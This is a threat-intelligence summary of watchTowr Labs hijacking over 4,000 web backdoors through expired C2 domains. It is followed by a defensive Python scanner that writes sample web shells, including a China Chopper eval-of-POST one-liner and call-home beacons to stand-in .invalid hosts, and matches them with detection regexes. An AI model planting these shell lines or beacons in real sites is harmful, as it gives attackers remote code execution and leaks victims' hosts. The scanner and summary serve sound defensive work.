
Expired Domains Allowed Control Over 4,000 Backdoors on Compromised Systems

Threat Actors: Various threat actors leveraging web backdoors, including China-nexus APT groups (e.g., users of China Chopper).

Campaign Overview: watchTowr Labs hijacked 4,000+ web backdoors by registering the abandoned or expired domains they called home to.
• Cost of operation: as low as $20 per domain.
• Sinkholing performed in partnership with the Shadowserver Foundation.

Target Regions (or Victims):
• Government entities: Bangladesh, China, Nigeria.
• Academic institutions: China, South Korea, Thailand.
• Other affected regions: Argentina, India, Indonesia, Israel, Pakistan, Philippines, Ukraine, U.S., and others.

Methodology:
• Registered 40+ abandoned domains that the backdoors used for C2 communication.
• Observed beaconing activity from compromised hosts once the domains resolved to watchTowr infrastructure.
• Some web shells had been backdoored by their original maintainers; those hidden call-homes inadvertently revealed where the shells were deployed.

Product Targeted: Systems with web backdoors (e.g., c99shell, r57shell, China Chopper).

Malware Reference: Web shells: China Chopper, c99shell, r57shell.

Tools Used: Web shells (for persistent remote access and exploitation).

Vulnerabilities Exploited (weaknesses in attacker infrastructure, not software CVEs):
• Reliance on abandoned infrastructure and expired domains for C2.
• Backdoors in web shells leaking deployment locations.

TTPs:
• Hijacking abandoned infrastructure.
• Sinkholing domains.
• Monitoring compromised hosts through beaconing activity.
• Persistent access via web shells.

Attribution:
• Conducted by watchTowr Labs.
• Observed China-nexus APT groups leveraging certain web shells (e.g., China Chopper).

Recommendations:
• Monitor and secure infrastructure to avoid domain expiration.
• Regularly check for unauthorized web shells on systems.
• Implement strict access controls and real-time monitoring for beaconing activity.

Source: The Hacker News
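As an added example (not code from watchTowr Labs, Shadowserver or the article), the Python script below turns the second and third recommendations into something a defender can run offline: it walks a web root for files matching illustrative signatures for the three shells named above and extracts the hostnames those files phone home to, because a hard-coded callback domain that has lapsed is exactly what allowed the backdoors to be hijacked. The signature patterns, the sample files and the .invalid hostnames are constructed for this example; checking each extracted domain's registration status (WHOIS) is left to the operator and is not performed here.

```python
"""Scan a web root for known web-shell signatures and list the callback
hostnames those files phone home to.

Added example; not code from watchTowr Labs, Shadowserver or The Hacker
News. The signature patterns and the sample files are assumptions built
for illustration, and every hostname used ends in the reserved .invalid TLD.
"""
import os
import re
import tempfile
from typing import Dict, List

# Name -> pattern. Illustrative patterns for the shells the summary names,
# not a complete or vendor-maintained rule set.
SIGNATURES: Dict[str, "re.Pattern[str]"] = {
    # China Chopper PHP variant: eval() of a request parameter.
    "China Chopper": re.compile(r"@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[", re.I),
    # c99shell and r57shell carry their own names in variables and banners.
    "c99shell": re.compile(r"c99sh", re.I),
    "r57shell": re.compile(r"r57shell", re.I),
    # Generic obfuscated loader used by many shells.
    "obfuscated eval": re.compile(
        r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I
    ),
}

# Places a shell typically hard-codes a call-home host: plain URLs and
# fsockopen() targets. Both patterns capture a bare hostname.
CALLBACK_PATTERNS = [
    re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I),
    re.compile(r"fsockopen\s*\(\s*['\"]([a-z0-9.-]+\.[a-z]{2,})['\"]", re.I),
]

WEB_EXTENSIONS = (".php", ".phtml", ".php5", ".phar")


def scan_file(path: str) -> dict:
    """Return {'path', 'matches', 'callbacks'} for one file.
    'matches' keeps SIGNATURES order; 'callbacks' is a sorted, deduplicated
    list of lowercased hostnames found in the file."""
    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
        body = fh.read()
    matches = [name for name, rx in SIGNATURES.items() if rx.search(body)]
    hosts = set()
    for rx in CALLBACK_PATTERNS:
        hosts.update(h.lower() for h in rx.findall(body))
    return {"path": path, "matches": matches, "callbacks": sorted(hosts)}


def scan_webroot(root: str) -> List[dict]:
    """Walk ROOT and return findings for every web file with at least one
    signature hit, sorted by path so results are stable."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            result = scan_file(os.path.join(dirpath, name))
            if result["matches"]:
                findings.append(result)
    return sorted(findings, key=lambda r: r["path"])


def build_sample_webroot() -> str:
    """Write three constructed files into a temp dir: a benign page, a China
    Chopper one-liner with an added call-home, and an r57-style shell that
    beacons to two hosts. Returns the directory path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = {
        "index.php": "<?php echo 'hello'; // ordinary page, no shell ?>\n",
        "cc.php": (
            "<?php @eval($_POST['pass']);\n"
            "@file_get_contents('http://tracker.example-expired.invalid/l.php?h='"
            ".$_SERVER['HTTP_HOST']); ?>\n"
        ),
        "r57.php": (
            "<?php /* r57shell v1.0 */\n"
            "eval(gzinflate(base64_decode('H4sI')));\n"
            "$s = @fsockopen(\"relay.backdoored-shell.invalid\", 80);\n"
            "echo \"<img src='http://stat.backdoored-shell.invalid/c.gif'>\"; ?>\n"
        ),
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def scan_sample() -> Dict[str, dict]:
    """Build the constructed sample web root, scan it, and key findings by
    file name so callers can inspect each result directly."""
    return {os.path.basename(f["path"]): f for f in scan_webroot(build_sample_webroot())}


if __name__ == "__main__":
    for name, f in scan_sample().items():
        print(f"{name}: {', '.join(f['matches'])}; callbacks: {f['callbacks'] or '-'}")
```

Run it directly to scan the constructed sample, or point scan_webroot() at a real document root. Every hostname it reports is a candidate for a registration check: if the domain is unregistered, anyone who pays the registration fee can receive that host's beacons, which is the scenario the summary describes.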

Read full article: https://thehackernews.com/2025/01/expired-domains-allowed-control-over.html

The above summary has been generated by an AI language model



Published on: January 14, 2025
